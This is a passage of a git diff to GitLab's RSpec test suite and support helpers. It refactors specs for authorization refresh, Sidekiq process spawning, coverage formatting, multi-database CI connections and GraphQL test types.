user.project_authorizations.delete_all - to_remove = user.project_authorizations + project_authorization = user.project_authorizations .create!(project: project, access_level: Gitlab::Access::DEVELOPER) + to_be_removed = [project_authorization.project_id] + + to_be_added = [ + { user_id: user.id, project_id: 
project.id, access_level: Gitlab::Access::MAINTAINER } + ] + expect(service).to receive(:update_authorizations) - .with([to_remove.project_id], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + .with(to_be_removed, to_be_added) service.execute_without_lease end @@ -134,7 +151,11 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do it 'inserts authorizations that should be added' do user.project_authorizations.delete_all - service.update_authorizations([], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + + service.update_authorizations([], to_be_added) authorizations = user.project_authorizations @@ -160,7 +181,11 @@ RSpec.describe Users::RefreshAuthorizedProjectsService do 'authorized_projects_refresh.rows_added_slice': [[user.id, project.id, Gitlab::Access::MAINTAINER]]) ) - service.update_authorizations([], [[user.id, project.id, Gitlab::Access::MAINTAINER]]) + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] + + service.update_authorizations([], to_be_added) end end end diff --git a/spec/services/verify_pages_domain_service_spec.rb b/spec/services/verify_pages_domain_service_spec.rb index ae079229891..2a3b3814065 100644 --- a/spec/services/verify_pages_domain_service_spec.rb +++ b/spec/services/verify_pages_domain_service_spec.rb @@ -372,7 +372,8 @@ RSpec.describe VerifyPagesDomainService do allow(resolver).to receive(:getresources) { [] } stubbed_lookups.each do |domain, records| records = Array(records).map { |txt| Resolv::DNS::Resource::IN::TXT.new(txt) } - allow(resolver).to receive(:getresources).with(domain, Resolv::DNS::Resource::IN::TXT) { records } + # Append '.' 
to domain_name, indicating absolute FQDN + allow(resolver).to receive(:getresources).with(domain + '.', Resolv::DNS::Resource::IN::TXT) { records } end resolver diff --git a/spec/sidekiq_cluster/sidekiq_cluster_spec.rb b/spec/sidekiq_cluster/sidekiq_cluster_spec.rb index 1d2b47e78ce..c0a919a4aec 100644 --- a/spec/sidekiq_cluster/sidekiq_cluster_spec.rb +++ b/spec/sidekiq_cluster/sidekiq_cluster_spec.rb @@ -5,68 +5,30 @@ require 'rspec-parameterized' require_relative '../../sidekiq_cluster/sidekiq_cluster' RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath - describe '.trap_signals' do - it 'traps the given signals' do - expect(described_class).to receive(:trap).ordered.with(:INT) - expect(described_class).to receive(:trap).ordered.with(:HUP) - - described_class.trap_signals(%i(INT HUP)) - end - end - - describe '.trap_terminate' do - it 'traps the termination signals' do - expect(described_class).to receive(:trap_signals) - .with(described_class::TERMINATE_SIGNALS) - - described_class.trap_terminate { } - end - end - - describe '.trap_forward' do - it 'traps the signals to forward' do - expect(described_class).to receive(:trap_signals) - .with(described_class::FORWARD_SIGNALS) - - described_class.trap_forward { } - end - end - - describe '.signal' do - it 'sends a signal to the given process' do - allow(Process).to receive(:kill).with(:INT, 4) - expect(described_class.signal(4, :INT)).to eq(true) - end - - it 'returns false when the process does not exist' do - allow(Process).to receive(:kill).with(:INT, 4).and_raise(Errno::ESRCH) - expect(described_class.signal(4, :INT)).to eq(false) - end - end - - describe '.signal_processes' do - it 'sends a signal to every given process' do - expect(described_class).to receive(:signal).with(1, :INT) - - described_class.signal_processes([1], :INT) - end - end - describe '.start' do it 'starts Sidekiq with the given queues, environment and options' do - expected_options = { - env: :production, - directory: 
'foo/bar', - max_concurrency: 20, - min_concurrency: 10, - timeout: 25, - dryrun: true + process_options = { + pgroup: true, + err: $stderr, + out: $stdout } - expect(described_class).to receive(:start_sidekiq).ordered.with(%w(foo), expected_options.merge(worker_id: 0)) - expect(described_class).to receive(:start_sidekiq).ordered.with(%w(bar baz), expected_options.merge(worker_id: 1)) + expect(Bundler).to receive(:with_original_env).and_call_original.twice + + expect(Process).to receive(:spawn).ordered.with({ + "ENABLE_SIDEKIQ_CLUSTER" => "1", + "SIDEKIQ_WORKER_ID" => "0" + }, + "bundle", "exec", "sidekiq", "-c10", "-eproduction", "-t25", "-gqueues:foo", "-rfoo/bar", "-qfoo,1", process_options + ) + expect(Process).to receive(:spawn).ordered.with({ + "ENABLE_SIDEKIQ_CLUSTER" => "1", + "SIDEKIQ_WORKER_ID" => "1" + }, + "bundle", "exec", "sidekiq", "-c10", "-eproduction", "-t25", "-gqueues:bar,baz", "-rfoo/bar", "-qbar,1", "-qbaz,1", process_options + ) - described_class.start([%w(foo), %w(bar baz)], env: :production, directory: 'foo/bar', max_concurrency: 20, min_concurrency: 10, dryrun: true) + described_class.start([%w(foo), %w(bar baz)], env: :production, directory: 'foo/bar', max_concurrency: 20, min_concurrency: 10) end it 'starts Sidekiq with the given queues and sensible default options' do @@ -99,7 +61,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath it 'starts a Sidekiq process' do allow(Process).to receive(:spawn).and_return(1) - expect(described_class).to receive(:wait_async).with(1) + expect(Gitlab::ProcessManagement).to receive(:wait_async).with(1) expect(described_class.start_sidekiq(%w(foo), **options)).to eq(1) end @@ -109,7 +71,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath .with(env, *args, anything) .and_return(1) - expect(described_class).to receive(:wait_async).with(1) + expect(Gitlab::ProcessManagement).to receive(:wait_async).with(1) expect(described_class.start_sidekiq(%w(foo foo 
bar baz), **options)).to eq(1) end @@ -119,7 +81,7 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath .with(anything, *args, a_hash_including(pgroup: true)) .and_return(1) - allow(described_class).to receive(:wait_async) + allow(Gitlab::ProcessManagement).to receive(:wait_async) expect(described_class.start_sidekiq(%w(foo bar baz), **options)).to eq(1) end end @@ -152,57 +114,4 @@ RSpec.describe Gitlab::SidekiqCluster do # rubocop:disable RSpec/FilePath it { expect(described_class.concurrency(queues, min, max)).to eq(expected) } end end - - describe '.wait_async' do - it 'waits for a process in a separate thread' do - thread = described_class.wait_async(Process.spawn('true')) - - # Upon success Process.wait just returns the PID. - expect(thread.value).to be_a_kind_of(Numeric) - end - end - - # In the X_alive? checks, we check negative PIDs sometimes as a simple way - # to be sure the pids are definitely for non-existent processes. - # Note that -1 is special, and sends the signal to every process we have permission - # for, so we use -2, -3 etc - describe '.all_alive?' do - it 'returns true if all processes are alive' do - processes = [Process.pid] - - expect(described_class.all_alive?(processes)).to eq(true) - end - - it 'returns false when a thread was not alive' do - processes = [-2] - - expect(described_class.all_alive?(processes)).to eq(false) - end - end - - describe '.any_alive?' 
do - it 'returns true if at least one process is alive' do - processes = [Process.pid, -2] - - expect(described_class.any_alive?(processes)).to eq(true) - end - - it 'returns false when all threads are dead' do - processes = [-2, -3] - - expect(described_class.any_alive?(processes)).to eq(false) - end - end - - describe '.write_pid' do - it 'writes the PID of the current process to the given file' do - handle = double(:handle) - - allow(File).to receive(:open).with('/dev/null', 'w').and_yield(handle) - - expect(handle).to receive(:write).with(Process.pid.to_s) - - described_class.write_pid('/dev/null') - end - end end diff --git a/spec/simplecov_env.rb b/spec/simplecov_env.rb index 617a45ae449..a5efc8348a4 100644 --- a/spec/simplecov_env.rb +++ b/spec/simplecov_env.rb @@ -2,6 +2,7 @@ require 'simplecov' require 'simplecov-cobertura' +require 'simplecov-lcov' require_relative '../lib/gitlab/utils' module SimpleCovEnv @@ -18,10 +19,13 @@ module SimpleCovEnv end def configure_formatter + SimpleCov::Formatter::LcovFormatter.config.report_with_single_file = true + SimpleCov.formatters = SimpleCov::Formatter::MultiFormatter.new([ SimpleCov::Formatter::SimpleFormatter, SimpleCov::Formatter::HTMLFormatter, - SimpleCov::Formatter::CoberturaFormatter + SimpleCov::Formatter::CoberturaFormatter, + SimpleCov::Formatter::LcovFormatter ]) end @@ -49,11 +53,9 @@ module SimpleCovEnv track_files '{app,config/initializers,config/initializers_before_autoloader,db/post_migrate,haml_lint,lib,rubocop,tooling}/**/*.rb' add_filter '/vendor/ruby/' - add_filter '/app/controllers/sherlock/' + add_filter '/app/controllers/sherlock/' # Profiling tool used only in development add_filter '/bin/' - add_filter 'db/fixtures/' # Matches EE files as well - add_filter '/lib/gitlab/sidekiq_middleware/' - add_filter '/lib/system_check/' + add_filter 'db/fixtures/development/' # Matches EE files as well add_group 'Channels', 'app/channels' # Matches EE files as well add_group 'Controllers', 
'app/controllers' # Matches EE files as well diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 52560f1f1c3..c497f8245fe 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -239,6 +239,7 @@ RSpec.configure do |config| # is not yet opened at the time that is triggered config.prepend_before do ApplicationRecord.set_open_transactions_baseline + ::Ci::ApplicationRecord.set_open_transactions_baseline end config.append_before do @@ -247,6 +248,7 @@ RSpec.configure do |config| config.append_after do ApplicationRecord.reset_open_transactions_baseline + ::Ci::ApplicationRecord.reset_open_transactions_baseline end config.before do |example| @@ -321,10 +323,6 @@ RSpec.configure do |config| # For more information check https://gitlab.com/gitlab-org/gitlab/-/issues/339348 stub_feature_flags(new_header_search: false) - # Disable the override flag in order to enable the feature by default. - # See https://docs.gitlab.com/ee/development/feature_flags/#selectively-disable-by-actor - stub_feature_flags(surface_environment_creation_failure_override: false) - allow(Gitlab::GitalyClient).to receive(:can_use_disk?).and_return(enable_rugged) else unstub_all_feature_flags @@ -454,6 +452,13 @@ RSpec.configure do |config| $stdout = StringIO.new end + # Makes diffs show entire non-truncated values. + config.before(:each, unlimited_max_formatted_output_length: true) do |_example| + config.expect_with :rspec do |c| + c.max_formatted_output_length = nil + end + end + config.after(:each, :silence_stdout) do $stdout = STDOUT end @@ -476,6 +481,10 @@ Rugged::Settings['search_path_global'] = Rails.root.join('tmp/tests').to_s # Initialize FactoryDefault to use create_default helper TestProf::FactoryDefault.init +# Exclude the Geo proxy API request from getting on_next_request Warden handlers, +# necessary to prevent race conditions with feature tests not getting authenticated. 
+::Warden.asset_paths << %r{^/api/v4/geo/proxy$} + module TouchRackUploadedFile def initialize_from_file_path(path) super diff --git a/spec/support/database/cross-database-modification-allowlist.yml b/spec/support/database/cross-database-modification-allowlist.yml index d05812a64eb..d6e74349069 100644 --- a/spec/support/database/cross-database-modification-allowlist.yml +++ b/spec/support/database/cross-database-modification-allowlist.yml @@ -1,90 +1,31 @@ -- "./ee/spec/controllers/projects/settings/access_tokens_controller_spec.rb" -- "./ee/spec/lib/gitlab/ci/templates/Jobs/dast_default_branch_gitlab_ci_yaml_spec.rb" - "./ee/spec/mailers/notify_spec.rb" -- "./ee/spec/models/ci/bridge_spec.rb" -- "./ee/spec/models/ci/build_spec.rb" -- "./ee/spec/models/ci/minutes/additional_pack_spec.rb" -- "./ee/spec/models/ee/ci/job_artifact_spec.rb" - "./ee/spec/models/group_member_spec.rb" -- "./ee/spec/replicators/geo/pipeline_artifact_replicator_spec.rb" - "./ee/spec/replicators/geo/terraform_state_version_replicator_spec.rb" -- "./ee/spec/services/ci/destroy_pipeline_service_spec.rb" - "./ee/spec/services/ci/retry_build_service_spec.rb" -- "./ee/spec/services/ci/subscribe_bridge_service_spec.rb" -- "./ee/spec/services/deployments/auto_rollback_service_spec.rb" -- "./ee/spec/services/ee/ci/job_artifacts/destroy_all_expired_service_spec.rb" -- "./ee/spec/services/ee/users/destroy_service_spec.rb" -- "./ee/spec/services/projects/transfer_service_spec.rb" -- "./ee/spec/services/security/security_orchestration_policies/rule_schedule_service_spec.rb" - "./spec/controllers/abuse_reports_controller_spec.rb" -- "./spec/controllers/admin/spam_logs_controller_spec.rb" -- "./spec/controllers/admin/users_controller_spec.rb" - "./spec/controllers/omniauth_callbacks_controller_spec.rb" - "./spec/controllers/projects/issues_controller_spec.rb" -- "./spec/controllers/projects/pipelines_controller_spec.rb" -- "./spec/controllers/projects/settings/access_tokens_controller_spec.rb" - 
"./spec/features/issues/issue_detail_spec.rb" - "./spec/features/projects/pipelines/pipeline_spec.rb" - "./spec/features/signed_commits_spec.rb" - "./spec/helpers/issuables_helper_spec.rb" - "./spec/lib/gitlab/auth_spec.rb" - "./spec/lib/gitlab/ci/pipeline/chain/create_spec.rb" -- "./spec/lib/gitlab/ci/pipeline/chain/seed_block_spec.rb" -- "./spec/lib/gitlab/ci/pipeline/seed/build_spec.rb" -- "./spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb" -- "./spec/lib/gitlab/ci/templates/managed_cluster_applications_gitlab_ci_yaml_spec.rb" - "./spec/lib/gitlab/email/handler/create_issue_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_merge_request_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_note_handler_spec.rb" - "./spec/lib/gitlab/email/handler/create_note_on_issuable_handler_spec.rb" -- "./spec/lib/peek/views/active_record_spec.rb" -- "./spec/models/ci/build_need_spec.rb" - "./spec/models/ci/build_trace_chunk_spec.rb" -- "./spec/models/ci/group_variable_spec.rb" - "./spec/models/ci/job_artifact_spec.rb" -- "./spec/models/ci/job_variable_spec.rb" -- "./spec/models/ci/pipeline_spec.rb" - "./spec/models/ci/runner_spec.rb" -- "./spec/models/ci/variable_spec.rb" - "./spec/models/clusters/applications/runner_spec.rb" -- "./spec/models/commit_status_spec.rb" -- "./spec/models/concerns/batch_destroy_dependent_associations_spec.rb" -- "./spec/models/concerns/bulk_insertable_associations_spec.rb" -- "./spec/models/concerns/has_environment_scope_spec.rb" -- "./spec/models/concerns/token_authenticatable_spec.rb" - "./spec/models/design_management/version_spec.rb" - "./spec/models/hooks/system_hook_spec.rb" - "./spec/models/members/project_member_spec.rb" -- "./spec/models/spam_log_spec.rb" - "./spec/models/user_spec.rb" - 
"./spec/models/user_status_spec.rb" -- "./spec/requests/api/ci/pipeline_schedules_spec.rb" -- "./spec/requests/api/ci/pipelines_spec.rb" -- "./spec/requests/api/commit_statuses_spec.rb" - "./spec/requests/api/commits_spec.rb" -- "./spec/requests/api/graphql/mutations/ci/pipeline_destroy_spec.rb" -- "./spec/requests/api/resource_access_tokens_spec.rb" -- "./spec/requests/api/users_spec.rb" -- "./spec/services/ci/create_pipeline_service/environment_spec.rb" -- "./spec/services/ci/create_pipeline_service_spec.rb" -- "./spec/services/ci/destroy_pipeline_service_spec.rb" -- "./spec/services/ci/ensure_stage_service_spec.rb" -- "./spec/services/ci/expire_pipeline_cache_service_spec.rb" -- "./spec/services/ci/job_artifacts/destroy_all_expired_service_spec.rb" -- "./spec/services/ci/job_artifacts/destroy_associations_service_spec.rb" -- "./spec/services/ci/pipeline_bridge_status_service_spec.rb" -- "./spec/services/ci/pipelines/add_job_service_spec.rb" - "./spec/services/ci/retry_build_service_spec.rb" -- "./spec/services/groups/transfer_service_spec.rb" -- "./spec/services/projects/destroy_service_spec.rb" - "./spec/services/projects/overwrite_project_service_spec.rb" -- "./spec/services/projects/transfer_service_spec.rb" -- "./spec/services/resource_access_tokens/revoke_service_spec.rb" -- "./spec/services/users/destroy_service_spec.rb" -- "./spec/services/users/reject_service_spec.rb" - "./spec/workers/merge_requests/create_pipeline_worker_spec.rb" -- "./spec/workers/remove_expired_members_worker_spec.rb" - "./spec/workers/repository_cleanup_worker_spec.rb" diff --git a/spec/support/database/multiple_databases.rb b/spec/support/database/multiple_databases.rb index 9e72ea589e3..94857b47127 100644 --- a/spec/support/database/multiple_databases.rb +++ b/spec/support/database/multiple_databases.rb @@ -6,6 +6,10 @@ module Database skip 'Skipping because multiple databases not set up' unless Gitlab::Database.has_config?(:ci) end + def skip_if_multiple_databases_are_setup + 
skip 'Skipping because multiple databases are set up' if Gitlab::Database.has_config?(:ci) + end + def reconfigure_db_connection(name: nil, config_hash: {}, model: ActiveRecord::Base, config_model: nil) db_config = (config_model || model).connection_db_config @@ -46,6 +50,26 @@ module Database new_handler&.clear_all_connections! end # rubocop:enable Database/MultipleDatabases + + def with_added_ci_connection + if Gitlab::Database.has_config?(:ci) + # No need to add a ci: connection if we already have one + yield + else + with_reestablished_active_record_base(reconnect: true) do + reconfigure_db_connection( + name: :ci, + model: Ci::ApplicationRecord, + config_model: ActiveRecord::Base + ) + + yield + + # Cleanup connection_specification_name for Ci::ApplicationRecord + Ci::ApplicationRecord.remove_connection + end + end + end end module ActiveRecordBaseEstablishConnection @@ -69,18 +93,9 @@ RSpec.configure do |config| end end - config.around(:each, :mocked_ci_connection) do |example| - with_reestablished_active_record_base(reconnect: true) do - reconfigure_db_connection( - name: :ci, - model: Ci::ApplicationRecord, - config_model: ActiveRecord::Base - ) - + config.around(:each, :add_ci_connection) do |example| + with_added_ci_connection do example.run - - # Cleanup connection_specification_name for Ci::ApplicationRecord - Ci::ApplicationRecord.remove_connection end end end diff --git a/spec/support/database/prevent_cross_joins.rb b/spec/support/database/prevent_cross_joins.rb index e69374fbc70..42c69a26788 100644 --- a/spec/support/database/prevent_cross_joins.rb +++ b/spec/support/database/prevent_cross_joins.rb @@ -31,9 +31,13 @@ module Database # See https://gitlab.com/gitlab-org/gitlab/-/issues/339396 return if sql.include?("DISABLE TRIGGER") || sql.include?("ENABLE TRIGGER") - # PgQuery might fail in some cases due to limited nesting: - # https://github.com/pganalyze/pg_query/issues/209 - tables = PgQuery.parse(sql).tables + tables = begin + 
PgQuery.parse(sql).tables + rescue PgQuery::ParseError + # PgQuery might fail in some cases due to limited nesting: + # https://github.com/pganalyze/pg_query/issues/209 + return + end schemas = ::Gitlab::Database::GitlabSchema.table_schemas(tables) diff --git a/spec/support/database/query_analyzer.rb b/spec/support/database/query_analyzer.rb index 85fa55f81ef..6d6627d54b9 100644 --- a/spec/support/database/query_analyzer.rb +++ b/spec/support/database/query_analyzer.rb @@ -4,11 +4,15 @@ # can be disabled selectively RSpec.configure do |config| - config.around do |example| + config.before do |example| if example.metadata.fetch(:query_analyzers, true) - ::Gitlab::Database::QueryAnalyzer.instance.within { example.run } - else - example.run + ::Gitlab::Database::QueryAnalyzer.instance.begin! + end + end + + config.after do |example| + if example.metadata.fetch(:query_analyzers, true) + ::Gitlab::Database::QueryAnalyzer.instance.end! end end end diff --git a/spec/support/flaky_tests.rb b/spec/support/flaky_tests.rb index 30a064d8705..0c211af695d 100644 --- a/spec/support/flaky_tests.rb +++ b/spec/support/flaky_tests.rb @@ -11,7 +11,7 @@ RSpec.configure do |config| raise "$SUITE_FLAKY_RSPEC_REPORT_PATH is empty." if ENV['SUITE_FLAKY_RSPEC_REPORT_PATH'].to_s.empty? 
raise "#{ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']} doesn't exist" unless File.exist?(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']) - RspecFlaky::Report.load(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']).map { |_, flaky_test_data| flaky_test_data["example_id"] } + RspecFlaky::Report.load(ENV['SUITE_FLAKY_RSPEC_REPORT_PATH']).map { |_, flaky_test_data| flaky_test_data.to_h[:example_id] } rescue => e # rubocop:disable Style/RescueStandardError puts e [] diff --git a/spec/support/frontend_fixtures.rb b/spec/support/frontend_fixtures.rb new file mode 100644 index 00000000000..5587d9059dd --- /dev/null +++ b/spec/support/frontend_fixtures.rb @@ -0,0 +1,16 @@ +# frozen_string_literal: true + +return unless ENV['CI'] +return unless ENV['GENERATE_FRONTEND_FIXTURES_MAPPING'] == 'true' + +RSpec.configure do |config| + config.before(:suite) do + $fixtures_mapping = Hash.new { |h, k| h[k] = [] } # rubocop:disable Style/GlobalVars + end + + config.after(:suite) do + next unless ENV['FRONTEND_FIXTURES_MAPPING_PATH'] + + File.write(ENV['FRONTEND_FIXTURES_MAPPING_PATH'], $fixtures_mapping.to_json) # rubocop:disable Style/GlobalVars + end +end diff --git a/spec/support/graphql/fake_query_type.rb b/spec/support/graphql/fake_query_type.rb index ffd851a6e6a..18cf2cf3e82 100644 --- a/spec/support/graphql/fake_query_type.rb +++ b/spec/support/graphql/fake_query_type.rb @@ -1,15 +1,22 @@ # frozen_string_literal: true +require 'graphql' module Graphql - class FakeQueryType < Types::BaseObject + class FakeQueryType < ::GraphQL::Schema::Object graphql_name 'FakeQuery' field :hello_world, String, null: true do argument :message, String, required: false end + field :breaking_field, String, null: true + def hello_world(message: "world") "Hello #{message}!" 
end + + def breaking_field + raise "This field is supposed to break" + end end end diff --git a/spec/support/graphql/field_inspection.rb b/spec/support/graphql/field_inspection.rb index f39ba751141..e5fe37ec555 100644 --- a/spec/support/graphql/field_inspection.rb +++ b/spec/support/graphql/field_inspection.rb @@ -22,7 +22,7 @@ module Graphql @type ||= begin field_type = @field.type.respond_to?(:to_graphql) ? @field.type.to_graphql : @field.type - # The type could be nested. For example `[GraphQL::STRING_TYPE]`: + # The type could be nested. For example `[GraphQL::Types::String]`: # - List # - String! # - String diff --git a/spec/support/helpers/api_helpers.rb b/spec/support/helpers/api_helpers.rb index d3cc7367b6e..fd85071cca3 100644 --- a/spec/support/helpers/api_helpers.rb +++ b/spec/support/helpers/api_helpers.rb @@ -19,13 +19,15 @@ module ApiHelpers # => "/api/v2/issues?foo=bar&private_token=..." # # Returns the relative path to the requested API resource - def api(path, user = nil, version: API::API.version, personal_access_token: nil, oauth_access_token: nil) + def api(path, user = nil, version: API::API.version, personal_access_token: nil, oauth_access_token: nil, job_token: nil) full_path = "/api/#{version}#{path}" if oauth_access_token query_string = "access_token=#{oauth_access_token.token}" elsif personal_access_token query_string = "private_token=#{personal_access_token.token}" + elsif job_token + query_string = "job_token=#{job_token}" elsif user personal_access_token = create(:personal_access_token, user: user) query_string = "private_token=#{personal_access_token.token}" diff --git a/spec/support/helpers/features/invite_members_modal_helper.rb b/spec/support/helpers/features/invite_members_modal_helper.rb index 3502558b2c2..11040562b49 100644 --- a/spec/support/helpers/features/invite_members_modal_helper.rb +++ b/spec/support/helpers/features/invite_members_modal_helper.rb @@ -5,7 +5,7 @@ module Spec module Helpers module Features module 
InviteMembersModalHelper - def invite_member(name, role: 'Guest', expires_at: nil, area_of_focus: false) + def invite_member(name, role: 'Guest', expires_at: nil) click_on 'Invite members' page.within '[data-testid="invite-members-modal"]' do @@ -14,7 +14,6 @@ module Spec wait_for_requests click_button name choose_options(role, expires_at) - choose_area_of_focus if area_of_focus click_button 'Invite' @@ -44,13 +43,6 @@ module Spec fill_in 'YYYY-MM-DD', with: expires_at.strftime('%Y-%m-%d') if expires_at end - - def choose_area_of_focus - page.within '[data-testid="area-of-focus-checks"]' do - check 'Contribute to the codebase' - check 'Collaborate on open issues and merge requests' - end - end end end end diff --git a/spec/support/helpers/gitaly_setup.rb b/spec/support/helpers/gitaly_setup.rb index 8a329c2f9dd..923051a2e04 100644 --- a/spec/support/helpers/gitaly_setup.rb +++ b/spec/support/helpers/gitaly_setup.rb @@ -18,8 +18,12 @@ module GitalySetup Logger.new($stdout, level: level, formatter: ->(_, _, _, msg) { msg }) end + def expand_path(path) + File.expand_path(path, File.join(__dir__, '../../..')) + end + def tmp_tests_gitaly_dir - File.expand_path('../../../tmp/tests/gitaly', __dir__) + expand_path('tmp/tests/gitaly') end def tmp_tests_gitaly_bin_dir @@ -27,11 +31,11 @@ module GitalySetup end def tmp_tests_gitlab_shell_dir - File.expand_path('../../../tmp/tests/gitlab-shell', __dir__) + expand_path('tmp/tests/gitlab-shell') end def rails_gitlab_shell_secret - File.expand_path('../../../.gitlab_shell_secret', __dir__) + expand_path('.gitlab_shell_secret') end def gemfile @@ -48,7 +52,7 @@ module GitalySetup def env { - 'HOME' => File.expand_path('tmp/tests'), + 'HOME' => expand_path('tmp/tests'), 'GEM_PATH' => Gem.path.join(':'), 'BUNDLE_APP_CONFIG' => File.join(gemfile_dir, '.bundle'), 'BUNDLE_INSTALL_FLAGS' => nil, @@ -67,7 +71,7 @@ module GitalySetup system('bundle config set --local retry 3', chdir: gemfile_dir) if ENV['CI'] - bundle_path = 
File.expand_path('../../../vendor/gitaly-ruby', __dir__) + bundle_path = expand_path('vendor/gitaly-ruby') system('bundle', 'config', 'set', '--local', 'path', bundle_path, chdir: gemfile_dir) end end @@ -154,7 +158,7 @@ module GitalySetup LOGGER.debug "Checking gitaly-ruby bundle...\n" out = ENV['CI'] ? $stdout : '/dev/null' - abort 'bundle check failed' unless system(env, 'bundle', 'check', out: out, chdir: File.dirname(gemfile)) + abort 'bundle check failed' unless system(env, 'bundle', 'check', out: out, chdir: gemfile_dir) end def read_socket_path(service) diff --git a/spec/support/helpers/gpg_helpers.rb b/spec/support/helpers/gpg_helpers.rb index 81e669aab57..7e78fd86de3 100644 --- a/spec/support/helpers/gpg_helpers.rb +++ b/spec/support/helpers/gpg_helpers.rb @@ -138,7 +138,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint @@ -281,7 +281,7 @@ module GpgHelpers end def primary_keyid2 - fingerprint2[-16..-1] + fingerprint2[-16..] end def fingerprint2 @@ -374,7 +374,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint @@ -776,7 +776,7 @@ module GpgHelpers end def primary_keyid - fingerprint[-16..-1] + fingerprint[-16..] end def fingerprint diff --git a/spec/support/helpers/graphql_helpers.rb b/spec/support/helpers/graphql_helpers.rb index 1f0c9b658dc..8b7d1c753d5 100644 --- a/spec/support/helpers/graphql_helpers.rb +++ b/spec/support/helpers/graphql_helpers.rb @@ -515,8 +515,13 @@ module GraphqlHelpers # Allows for array indexing, like this # ['project', 'boards', 'edges', 0, 'node', 'lists'] keys.reduce(data) do |memo, key| - if memo.is_a?(Array) - key.is_a?(Integer) ? memo[key] : memo.flat_map { |e| Array.wrap(e[key]) } + if memo.is_a?(Array) && key.is_a?(Integer) + memo[key] + elsif memo.is_a?(Array) + memo.compact.flat_map do |e| + x = e[key] + x.nil? ? 
[x] : Array.wrap(x) + end else memo&.dig(key) end diff --git a/spec/support/helpers/javascript_fixtures_helpers.rb b/spec/support/helpers/javascript_fixtures_helpers.rb index fb909008f12..84cd0181533 100644 --- a/spec/support/helpers/javascript_fixtures_helpers.rb +++ b/spec/support/helpers/javascript_fixtures_helpers.rb @@ -13,6 +13,12 @@ module JavaScriptFixturesHelpers included do |base| base.around do |example| + # Don't actually run the example when we're only interested in the `test file -> JSON frontend fixture` mapping + if ENV['GENERATE_FRONTEND_FIXTURES_MAPPING'] == 'true' + $fixtures_mapping[example.metadata[:file_path].delete_prefix('./')] << File.join(fixture_root_path, example.description) # rubocop:disable Style/GlobalVars + next + end + # pick an arbitrary date from the past, so tests are not time dependent # Also see spec/frontend/__helpers__/fake_date/jest.js Timecop.freeze(Time.utc(2015, 7, 3, 10)) { example.run } diff --git a/spec/support/helpers/memory_usage_helper.rb b/spec/support/helpers/memory_usage_helper.rb index aa7b3bae83a..02d1935921f 100644 --- a/spec/support/helpers/memory_usage_helper.rb +++ b/spec/support/helpers/memory_usage_helper.rb @@ -23,7 +23,7 @@ module MemoryUsageHelper output, status = Gitlab::Popen.popen(%w(free -m)) abort "`free -m` return code is #{status}: #{output}" unless status == 0 - result = output.split("\n")[1].split(" ")[1..-1] + result = output.split("\n")[1].split(" ")[1..] 
attrs = %i(m_total m_used m_free m_shared m_buffers_cache m_available).freeze attrs.zip(result).to_h diff --git a/spec/support/helpers/migrations_helpers/work_item_types_helper.rb b/spec/support/helpers/migrations_helpers/work_item_types_helper.rb new file mode 100644 index 00000000000..59b1f1b1305 --- /dev/null +++ b/spec/support/helpers/migrations_helpers/work_item_types_helper.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +module MigrationHelpers + module WorkItemTypesHelper + DEFAULT_WORK_ITEM_TYPES = { + issue: { name: 'Issue', icon_name: 'issue-type-issue', enum_value: 0 }, + incident: { name: 'Incident', icon_name: 'issue-type-incident', enum_value: 1 }, + test_case: { name: 'Test Case', icon_name: 'issue-type-test-case', enum_value: 2 }, + requirement: { name: 'Requirement', icon_name: 'issue-type-requirements', enum_value: 3 }, + task: { name: 'Task', icon_name: 'issue-type-task', enum_value: 4 } + }.freeze + + def reset_work_item_types + work_item_types_table.delete_all + + DEFAULT_WORK_ITEM_TYPES.each do |type, attributes| + work_item_types_table.create!(base_type: attributes[:enum_value], **attributes.slice(:name, :icon_name)) + end + end + + private + + def work_item_types_table + table(:work_item_types) + end + end +end diff --git a/spec/support/helpers/modal_helpers.rb b/spec/support/helpers/modal_helpers.rb new file mode 100644 index 00000000000..a1f03cc0da5 --- /dev/null +++ b/spec/support/helpers/modal_helpers.rb @@ -0,0 +1,27 @@ +# frozen_string_literal: true + +module Spec + module Support + module Helpers + module ModalHelpers + def within_modal + page.within('[role="dialog"]') do + yield + end + end + + def accept_gl_confirm(text = nil, button_text: 'OK') + yield if block_given? + + within_modal do + unless text.nil? 
